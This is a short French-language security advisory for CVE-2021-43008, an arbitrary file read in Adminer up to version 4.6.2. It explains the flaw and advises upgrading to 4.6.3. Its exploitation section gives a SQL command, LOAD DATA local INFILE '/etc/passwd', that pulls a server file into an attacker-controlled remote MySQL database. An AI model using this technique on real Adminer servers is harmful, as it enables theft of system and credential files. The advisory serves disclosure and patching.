CVE-2021-43008 - Adminer - Arbitrary file read

July 17, 2021 Une minute de lecture

Linux • CVEs

cve

Titre : Adminer - Arbitrary file read
Auteur : @Podalirius
CVSS : 5.3 (Medium)
CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Résumé

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.

Produits affectés

Toutes les versions d’Adminer <= 4.6.2 sont vulnérables :

Versions vulnérables d’Adminer

Exploitation

Afin d’exploiter cette vulnérabilité, un attaquant doit accéder à la page de connexion d’Adminer et se reconnecter à une base de données MySQL distante qu’il contrôle :

Après cela, l’attaquant se rend sur la page “SQL Command” de l’Adminer :

Avec la commande SQL suivante, l’attaquant peut lire un fichier local sur la ligne du serveur Adminer et le charger dans sa base de données distante :

LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";

Une fois cela fait, l’attaquant peut récupérer le contenu du fichier lu avec SELECT * FROM lfr_sink_table; :

Remédiations

Afin de corriger cette vulnérabilité, vous devez mettre à jour votre Adminer à une version supérieure ou égale à la 4.6.3.